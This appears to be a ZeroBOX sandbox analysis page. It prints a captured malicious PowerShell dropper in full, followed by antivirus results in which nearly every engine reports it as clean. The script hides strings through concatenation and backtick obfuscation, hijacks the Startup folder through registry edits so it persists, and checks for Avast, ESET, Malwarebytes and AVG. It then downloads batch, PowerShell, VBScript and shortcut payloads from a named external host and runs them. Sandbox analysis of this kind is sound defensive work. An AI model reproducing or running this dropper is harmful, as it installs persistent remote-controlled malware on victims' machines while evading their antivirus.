popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
[system.io.directory]::CreateDirectory("C:\P"+"r"+"o"+"g"+"ra"+"mDa"+"t"+"a\Micr"+"oso"+"f"+"t A"+"rts"+"\S"+"ta"+"rt\")
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
Function aloshy
if([System.IO.File]::Exists("C:\Program Files\Avast Software\Avast\AvastUI.exe")){
start-sleep -s 10
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
elseif([System.IO.File]::Exists("C:\Program Files\ESET\ESET Security\ecmds.exe")){
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/2.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
elseif([System.IO.File]::Exists("C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe")){
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
elseif([System.IO.File]::Exists("C:\Program Files\AVG\Antivirus\AVGUI.exe")){
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
$defender = 'C^^^^^^^^^^^^^^^^^^blic\'.Replace("^^^^^^^^^^^^^^^^^^",":\Users\Pu")
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://nyc002.hawkhost.com/~mazenne1/NDef/all.bat', $defender + '11.ps1')){
$def = 'C^^^^^^^^^^^^^^^^^^blic\'.Replace("^^^^^^^^^^^^^^^^^^",":\Users\Pu")
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://nyc002.hawkhost.com/~mazenne1/ExDef/ss.vbs', $def + 'ss.vbs')){
start-sleep -s 25
start "C:\Users\Public\ss.vbs"
start-sleep -s 20
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
IEX aloshy
Antivirus Signature
Bkav Clean
DrWeb Clean
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
AegisLab Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Clean
BitDefenderTheta Clean
Cyren Clean
Symantec ISB.Downloader!gen221
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
Baidu Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Emsisoft Clean
Jiangmin Clean
Avira Clean
MAX Clean
Kingsoft Clean
Gridinsoft Clean
Microsoft Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
GData Clean
Cynet Clean
AhnLab-V3 Clean
VBA32 Clean
ALYac Clean
TACHYON Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
Panda Clean
Qihoo-360 Clean
No IRMA results available.